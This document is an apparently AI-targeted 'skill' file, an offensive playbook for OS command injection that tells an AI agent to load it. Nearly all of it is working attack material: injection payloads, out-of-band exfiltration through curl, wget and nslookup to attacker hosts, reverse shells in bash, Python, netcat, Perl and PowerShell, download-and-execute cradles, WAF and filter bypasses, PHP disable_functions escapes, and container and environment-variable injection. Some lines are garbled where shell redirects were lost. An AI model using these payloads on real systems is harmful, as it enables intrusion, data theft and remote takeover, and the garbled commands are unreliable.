SKILL: OS Command Injection — Expert Attack Playbook

AI LOAD INSTRUCTION

Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors. 0. RELATED ROUTING Before going deep, you can first load: upload insecure files when the shell sink is part of a broader upload, import, or conversion workflow First-pass payload families Context Start With Backup generic shell separator ;id &&id quoted argument ";id;" ';id;' blind timing ;sleep 5 & timeout /T 5 /NOBREAK command substitution $(id) id out-of-band DNS ;nslookup token.collab Windows nslookup variant cat$IFS/etc/passwd {cat,/etc/passwd} %0aid 1. SHELL METACHARACTERS (INJECTION OPERATORS) These characters break out of the command context and inject new commands: Metacharacter Behavior Example ; Runs second command regardless dir; whoami | Pipes stdout to second command dir | whoami || Run second only if first FAILS dir || whoami & Run second in background (or sequenced in Windows) dir & whoami && Run second only if first SUCCEEDS dir && whoami $(cmd) Command substitution echo $(whoami) cmd Command substitution (backtick) echo whoami

Redirect stdout to file cmd > /tmp/out

Append to file cmd >> /tmp/out < Read file as stdin cmd < /etc/passwd %0a Newline character (URL-encoded) cmd%0awhoami %0d%0a CRLF Multi-command injection 2. COMMON VULNERABLE CODE PATTERNS PHP $dir = $_GET [ 'dir' ] ; $out = shell_exec ( "du -h /var/www/html/" . $dir ) ; // Inject: dir=../ ; cat /etc/passwd // Inject: dir=../ $(cat /etc/passwd) exec ( "ping -c 1 " . $ip ) ; // $ip = "127.0.0.1 && cat /etc/passwd" system ( "convert " . $file ) ; // ImageMagick RCE passthru ( "nslookup " . $host ) ; // $host = "x.com; id" Python import os os . system ( "curl " + url )

url = "x.com; id"

subprocess . call ( "ls " + path , shell = True )

shell=True is the key vulnerability

os . popen ( "ping " + host ) Node.js const { exec } = require ( 'child_process' ) ; exec ( 'ping ' + req . query . host , ... ) ; // host = "x.com; id" Perl $dir = param ( "dir" ) ; $command = "du -h /var/www/html" . $dir ; system ( $command ) ; // Inject dir field : | cat / etc / passwd ASP (Classic) szCMD = "type C:\logs\" & Request . Form ( "FileName" ) Set oShell = Server . CreateObject ( "WScript.Shell" ) oShell . Run szCMD / / Inject FileName : foo . txt & whoami

C : \ inetpub \ wwwroot \ out . txt 3. BLIND COMMAND INJECTION — DETECTION When response shows no command output: Time-Based Detection

Linux:

; sleep 5 | sleep 5 $( sleep 5 ) sleep 5 & sleep 5 &

Windows:

& timeout /T 5 /NOBREAK & ping -n 5 127.0 .0.1 & waitfor /T 5 signal777 Compare response time without payload vs with payload. 5+ second delay = confirmed. OOB via DNS

Linux:

; nslookup BURP_COLLAB_HOST ; host whoami .BURP_COLLAB_HOST $( nslookup $( whoami ) .BURP_COLLAB_HOST )

Windows:

& nslookup BURP_COLLAB_HOST & nslookup %USERNAME%.BURP_COLLAB_HOST OOB via HTTP

Linux:

; curl http://BURP_COLLAB_HOST/ whoami ; wget http://BURP_COLLAB_HOST/ $( id | base64 )

Windows:

& powershell -c "Invoke-WebRequest http://BURP_COLLAB_HOST/ $( whoami ) " OOB via Out-of-Band File ; id

/var/www/html/RANDOM_FILE.txt

Then access: https://target.com/RANDOM_FILE.txt

1. INJECTION CONTEXT VARIATIONS Within Quoted String command "INJECT"

Inject: " ; id ; "

Result: command "" ; id ; ""

Within Single-Quoted String command 'INJECT'

Inject: '; id;'

Result: command ''; id;''

Within Backtick Execution output = command INJECT

Inject: x; id ;

File Path Context cat /var/log/INJECT

Inject: ../../../etc/passwd (path traversal)

Inject: access.log; id (command injection)

1. PAYLOAD LIBRARY Information Gathering ; id

current user

; whoami

user name

; uname -a

OS info

; cat /etc/passwd

user list

; cat /etc/shadow

password hashes (if root)

; ls /home/

home directories

; env

environment variables (DB creds, API keys!)

; printenv

same

; cat /proc/1/environ

process environment

; ifconfig

network interfaces

; cat /etc/hosts

host entries

Reverse Shells (Linux)

Bash:

; bash -i

& /dev/tcp/ATTACKER/4444 0

&1 ; bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'

Python:

; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Netcat (with -e):

; nc ATTACKER 4444 -e /bin/bash

Netcat (without -e / OpenBSD):

; rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2

&1 | nc ATTACKER 4444

/tmp/f

Perl:

; perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Reverse Shells (Windows via PowerShell) & powershell - NoP - NonI - W Hidden - Exec Bypass - c "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')" & powershell - c " $client = New-Object System.Net.Sockets.TCPClient('ATTACKER',4444); $stream = $client .GetStream();[byte[]] $bytes = 0..65535|%{0};while(( $i = $stream .Read( $bytes , 0, $bytes .Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString( $bytes ,0, $i ); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes( $sendback2 ); $stream .Write( $sendbyte ,0, $sendbyte .Length); $stream .Flush()}; $client .Close()" 6. FILTER BYPASS TECHNIQUES Space Alternatives (when space is filtered) cat < /etc/passwd

< instead of space

{ cat,/etc/passwd }

brace expansion

cat $IFS /etc/passwd

$IFS variable (field separator)

X

$' \x20 ' && cat ${X} /etc/passwd

hex encoded space

Slash Alternatives (when / is filtered) $' \057 ' etc $' \057 ' passwd

octal representation

cat /???/???sec???

glob expansion

Keyword Bypass via Variable Assembly a = c ; b = at ; c = /etc/passwd ; $a $b $c

'cat /etc/passwd'

c

at ; ca $c /etc/passwd

cat

Newline Injection cmd%0Aid%0Awhoami # URL-encoded newlines cmd$'\n'id$'\n'whoami # literal newlines 7. COMMON INJECTION ENTRY POINTS Entry Example Network tools ping, nslookup, traceroute, whois forms File conversion image resize, PDF generate, format convert Email senders From address, name fields in notification emails Search/sort parameters Passed to grep, find, sort commands Log viewing Passed to tail, grep commands Custom script execution "Run test" features, CI/CD hooks DNS lookup features rDNS lookup, WHOIS query Backup/restore features File path parameters Archive processing zip/unzip, tar with user-provided filename 8. BLIND INJECTION DECISION TREE Found potential injection point? ├── Try basic: ; sleep 5 │ └── Response delays? → Confirmed blind injection │ ├── Extract data via timing: if/then sleep │ └── Use OOB: curl/nslookup to Collaborator │ ├── No delay observed? │ ├── Try: | sleep 5 │ ├── Try: $(sleep 5) │ ├── Try: sleep 5 │ ├── Try after URL encoding: %3B%20sleep%205 │ └── Try double encoding: %253B%2520sleep%25205 │ └── All blocked → check WEB APPLICATION LAYER Filter on input? → encode differently Filter on specific commands? → whitespace bypass, $IFS, glob 9. ADVANCED WAF BYPASS TECHNIQUES Wildcard Expansion

Use ? and * to bypass keyword filters:

/???/??t /???/p??s??

/bin/cat /etc/passwd

/???/???/????2 *.php

/usr/bin/find2 *.php (approximate)

Globbing for specific files:

cat /e?c/p?sswd cat /ec/pd cat Alternatives (when "cat" is filtered) tac /etc/passwd

reverse cat

nl /etc/passwd

numbered lines

head /etc/passwd tail /etc/passwd more /etc/passwd less /etc/passwd sort /etc/passwd uniq /etc/passwd rev /etc/passwd | rev xxd /etc/passwd strings /etc/passwd od -c /etc/passwd base64 /etc/passwd

then decode offline

Comment Insertion (PHP specific)

Insert comments within function names to bypass WAF:

sys/x/tem ( 'id' )

PHP ignores / / in some eval contexts

Note: this works with eval() and similar PHP dynamic calls

XOR String Construction (PHP)

Build function names from XOR of printable characters:

$_

( '%01' ^ '' ) . ( '%13' ^ '' ) . ( '%13' ^ '' ) . ( '%05' ^ '' ) . ( '%12' ^ '' ) . ( '%14' ^ '' ) ;

Produces: "assert"

$_ ( '%13%19%13%14%05%0d' | '%60%60%60%60%60%60' ) ;

Evaluates: assert("system")

Base64/ROT13 Encoding

Encode payload, decode at runtime:

base64_decode ( 'c3lzdGVt' ) ( 'id' ) ;

system('id')

str_rot13 ( 'flfgrz' ) ( 'id' ) ;

system → flfgrz via ROT13

chr() Assembly

Build strings character by character:

chr ( 115 ) . chr ( 121 ) . chr ( 115 ) . chr ( 116 ) . chr ( 101 ) . chr ( 109 )

"system"

Dollar-Sign Variable Tricks

$IFS (Internal Field Separator) as space:

cat $IFS /etc/passwd cat ${ IFS } /etc/passwd

Unset variables expand to empty:

c ${x} at /etc/passwd

$x is unset → "cat"

1. PHP disable_functions BYPASS PATHS When system() , exec() , shell_exec() , passthru() , popen() , proc_open() are all disabled: Path 1: LD_PRELOAD + mail()/putenv() // 1. Upload shared object (.so) that hooks a libc function // 2. Set LD_PRELOAD to point to it putenv ( "LD_PRELOAD=/tmp/evil.so" ) ; // 3. Trigger external process (mail() calls sendmail) mail ( "a@b.com" , "" , "" ) ; // The .so's constructor runs with shell access Path 2: Shellshock (CVE-2014-6271) // If bash is vulnerable to Shellshock: putenv ( "PHP_LOL=() { :; }; /usr/bin/id > /tmp/out" ) ; mail ( "a@b.com" , "" , "" ) ; // Bash processes the function definition and runs the trailing command Path 3: Apache mod_cgi + .htaccess // Write .htaccess enabling CGI: file_put_contents ( '/var/www/html/.htaccess' , 'Options +ExecCGI\nAddHandler cgi-script .sh' ) ; // Write CGI script: file_put_contents ( '/var/www/html/cmd.sh' , "#!/bin/bash\necho Content-type: text/html\necho\n $1 " ) ; chmod ( '/var/www/html/cmd.sh' , 0755 ) ; // Access: /cmd.sh?id Path 4: PHP-FPM / FastCGI // If PHP-FPM socket is accessible (/var/run/php-fpm.sock or port 9000): // Send crafted FastCGI request to execute arbitrary PHP with different php.ini // Tool: https://github.com/neex/phuip-fpizdam // Override: PHP_VALUE=auto_prepend_file=/tmp/shell.php Path 5: COM Object (Windows) // Windows only, if COM extension enabled: $wsh = new COM ( 'WScript.Shell' ) ; $exec = $wsh -> Run ( 'cmd /c whoami > C:\inetpub\wwwroot\out.txt' , 0 , true ) ; Path 6: ImageMagick Delegate (CVE-2016-3714 "ImageTragick") // If ImageMagick processes user-uploaded images: // Upload SVG/MVG with embedded command: // Content of exploit.svg: push graphic - context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|id > /tmp/pwned")' pop graphic - context Also consider (summary): iconv (CVE-2024-2961) via php://filter/convert.iconv ; FFI ( FFI::cdef + libc ) when the extension is enabled.
2. COMPONENT-LEVEL COMMAND INJECTION ImageMagick Delegate Abuse

MVG format with shell command in URL:

push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'https://127.0.0.1/x.php?x=id > /tmp/out' pop graphic-context

Or via filename: convert '|id' out.png

FFmpeg (HLS/concat protocol)

SSRF/LFI via m3u8 playlist:

EXTM3U

EXT-X-MEDIA-SEQUENCE:0

EXTINF:10.0,

concat:http://attacker.com/header.txt|file:///etc/passwd

EXT-X-ENDLIST

Upload as .m3u8, FFmpeg processes and may leak file contents in output

Elasticsearch Groovy Script (pre-5.x) POST /_search { "query" : { "match_all" : { } } , "script_fields" : { "cmd" : { "script" : "Runtime rt = Runtime.getRuntime(); rt.exec('id')" } } } Ping/Traceroute/NSLookup Diagnostic Pages

Classic injection point in network diagnostic features:

Input: 127.0.0.1; id

Input: 127.0.0.1 && cat /etc/passwd

Input: id.attacker.com (DNS exfil via backtick)

These features directly call OS commands with user input

Other sinks (quick reference): PDF generators (wkhtmltopdf / WeasyPrint with user HTML); Git wrappers ( git clone URL / hooks). 12. WINDOWS CMD.EXE VS POWERSHELL INJECTION MATRIX Feature cmd.exe PowerShell Command separator & , && , || , ; (limited) ; , | , & (call operator) Variable expansion %VARIABLE% , !VAR! (delayed) $env:VARIABLE , $Variable Escape character ^ (caret) ` (backtick) Command substitution FOR /F loops $() subexpression Encoded execution N/A -EncodedCommand (base64 UTF-16LE) Pipeline | (stdout only) | (objects, not text) Comment REM , ::

String quoting "double" only "double" , 'single' (no expansion) cmd.exe specific payloads REM Command chaining dir & whoami dir & & whoami dir || whoami REM Caret escape to bypass keyword filters w ^ h ^ o ^ a ^ m ^ i n ^ e ^ t u ^ s ^ e ^ r REM Variable expansion injection set CMD = whoami %CMD% REM Environment variable exfiltration via DNS nslookup %USERNAME% .attacker.com nslookup %COMPUTERNAME% .attacker.com REM Delayed expansion (when !var! is enabled ) cmd /V : ON /C "set x=whoami&!x!" PowerShell specific payloads

Semicolon separator

Get-Process ; whoami

Subexpression

" $ ( whoami ) " Write-Output $ ( hostname )

Base64 encoded command (UTF-16LE)

powershell

EncodedCommand dwBoAG8AYQBtAGkA

Decodes to: whoami

Invoke-Expression obfuscation

$a

'who' ; $b = 'ami' ; iex " $a $b " & ( gcm * ke- * ) "whoami"

Download and execute

IEX ( New-Object Net . WebClient ) . DownloadString ( 'http://attacker/payload.ps1' ) IEX ( iwr http: / / attacker/payload . ps1 - UseBasicParsing ) . Content

Constrained Language Mode bypass (if available)

powershell

Version 2

Command "whoami" Cross-platform payload differences Target Time delay DNS exfil File read Linux/macOS sleep 5 nslookup $(whoami).atk.com cat /etc/passwd cmd.exe timeout /T 5 /NOBREAK nslookup %USERNAME%.atk.com type C:\Windows\win.ini PowerShell Start-Sleep 5 nslookup $(whoami).atk.com Get-Content C:\Windows\win.ini Detection-first polyglot ;sleep${IFS}5;#&timeout /T 5 /NOBREAK&# Works across sh/bash/cmd contexts — one of the separators will fire. 13. CONTAINER / K8S EXEC INJECTION kubectl exec injection When a web application constructs kubectl exec commands with user input:

Vulnerable pattern

kubectl exec $POD_NAME -- /bin/sh -c "echo $USER_INPUT"

Injection via pod name

POD_NAME="mypod -- /bin/sh -c whoami #" → kubectl exec mypod -- /bin/sh -c whoami # -- /bin/sh -c "echo ..."

Injection via user input in command

USER_INPUT='"; cat /etc/passwd; echo "' → kubectl exec pod -- /bin/sh -c "echo ""; cat /etc/passwd; echo """ Docker exec injection

Vulnerable web admin panel

docker exec $CONTAINER_NAME $COMMAND

Injection via container name

CONTAINER_NAME="web_app -u root web_app" → docker exec web_app -u root web_app $COMMAND (runs as root)

Injection via command argument

COMMAND="status; cat /etc/shadow" → docker exec container /bin/sh -c "status; cat /etc/shadow" Container runtime API (unauthenticated)

Docker socket exposed (2375/2376 or /var/run/docker.sock)

POST /containers/create HTTP/1.1

Then start + exec

POST /containers/{id}/start POST /containers/{id}/exec {"Cmd":["cat","/host/etc/shadow"]}

Kubernetes API (6443/8443 unauthenticated)

POST /api/v1/namespaces/default/pods/{name}/exec?command=whoami&stdout=true Sinks to watch for Component Injection Vector CI/CD pipeline (Jenkins, GitLab CI) Build step parameters, environment variables Kubernetes CronJob .spec.containers[].command from user-defined schedules Helm chart values values.yaml templated into pod specs with {{ }} Container orchestration UI "Run command" features in Portainer, Rancher, etc. 14. ENVIRONMENT VARIABLE INJECTION When an application allows setting or influencing environment variables, several variables have implicit execution semantics: Linux / Unix Variable Effect Exploitation LD_PRELOAD Loaded before any shared library; constructor runs on process start putenv("LD_PRELOAD=/tmp/evil.so"); mail("a@b","",""); LD_LIBRARY_PATH Overrides library search path Place malicious libc.so.6 in controlled directory BASH_ENV Executed when non-interactive bash starts BASH_ENV=/tmp/evil.sh → any system() / popen() call sources it ENV Same as BASH_ENV for POSIX sh ENV=/tmp/evil.sh PROMPT_COMMAND Executed before each interactive prompt PROMPT_COMMAND="curl http://atk.com/$(whoami)" PS1 Prompt string, supports $() expansion in bash PS1='$(cat /etc/passwd > /tmp/out) \$ ' PYTHONSTARTUP Python script executed on interpreter startup Inject path to malicious .py file PERL5OPT Options passed to every Perl invocation PERL5OPT='-Mbase;system("id")' NODE_OPTIONS Options passed to every Node.js invocation NODE_OPTIONS='--require /tmp/evil.js' RUBYOPT Options for Ruby RUBYOPT='-r/tmp/evil.rb' Windows Variable Effect COMSPEC Path to command interpreter; system() calls use this PATH Command resolution order; place malicious binary earlier in path PSModulePath PowerShell auto-loads modules from these paths Attack scenarios PHP putenv() + mail() : // When putenv() is not disabled and mail() is available: putenv ( "LD_PRELOAD=/tmp/evil.so" ) ; mail ( "a@b.com" , "" , "" , "" ) ; // mail() invokes sendmail → loads evil.so → constructor executes arbitrary code Git hook injection via environment :

GIT_DIR / GIT_WORK_TREE manipulation

GIT_DIR

/tmp/evil_repo/.git git status

If hooks exist in the controlled repo, they execute

Node.js --require injection : NODE_OPTIONS = "--require=/tmp/reverse_shell.js" node /app/server.js

reverse_shell.js is loaded before server.js